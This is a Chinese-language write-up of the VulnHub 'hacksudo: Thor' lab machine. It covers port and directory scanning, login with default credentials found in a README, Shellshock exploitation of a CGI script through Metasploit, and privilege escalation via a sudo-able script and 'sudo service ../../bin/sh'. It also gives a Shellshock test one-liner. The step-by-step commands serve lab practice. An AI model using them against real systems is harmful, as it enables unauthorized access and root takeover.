準備:
攻擊機:虛擬機器kali、本機win10。
靶機:hacksudo: Thor,下載地址:https://download.vulnhub.com/hacksudo/hacksudo---Thor.zip,下載後直接vbox開啟即可。
知識點:service提權、Shellshock漏洞利用。
資訊收集:
掃描下埠對應的服務:nmap -T4 -sV -p- -A 192.168.110.6,顯示開放了22、80埠,開啟了ssh、http服務。
目錄掃描:
使用dirmap進行目錄掃描,發現admin_login.php、home.php、README.md、news.php等檔案。
訪問README.md檔案,發現關於賬戶的資訊:admin/password123。
使用獲得賬戶名和密碼資訊:admin/password123進行登入,在http://192.168.110.6/home.php登入失敗,但是在http://192.168.110.6/admin_login.php介面成功登入。
Shellshock-破殼漏洞:
然後在admin賬戶中建立了新的賬戶,在http://192.168.110.6/home.php進行登入,但是在兩個登陸後的介面中均未發現可以獲取shell的功能。然後在news.php中發現了cgi-bin,猜測這裡存在破殼漏洞。
使用dirsearch對http://192.168.110.6/cgi-bin/進行掃描,發現shell.sh檔案,但是訪問該檔案無法訪問。
使用msf進行驗證是否存在破殼漏洞,依次執行如下命令,經過驗證發現存在shellshock漏洞。
search Shellshock
use 2
show options
set rhost 192.168.110.6
set TARGETURI /cgi-bin/shell.sh
run
獲取shell:
使用msf依次執行以下命令,成功獲得shell許可權。
search Shellshock
use 1
show options
set rhost 192.168.110.6
set TARGETURI /cgi-bin/shell.sh
run
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
提權至thor:
檢視下當前賬戶是否存在可以使用的特權命令或檔案:sudo -l,發現/home/thor/./hammer.sh檔案。
使用thor的使用者許可權執行指令碼該指令碼,發現會讓我們輸入一個key(疑是我們的身份)一個secret(會被執行),在輸入bash時形成了一個新的shell視窗,許可權是thor。
獲得thor許可權後,在/home/thor目錄下發現user.txt檔案並讀取該檔案資訊,成功獲得flag值。
提權至root:
檢視下當前賬戶是否存在可以使用的特權命令或檔案:sudo -l,發現cat和service命令。
查詢下service命令的提權方式,得到其提權命令:sudo service ../../bin/sh,成功提權到root許可權並在/root目錄下發現root.txt檔案並讀取到flag值。
補充:
如果我們可以正常使用目標伺服器時,也可以透過以下命令:env x='() { :;}; echo vulnerable' bash -c "echo this is a test ",來進行測試是否存在Shellshock漏洞,下面是存在此漏洞和不存在此漏洞的對比圖,左側無此漏洞,右側存在此漏洞。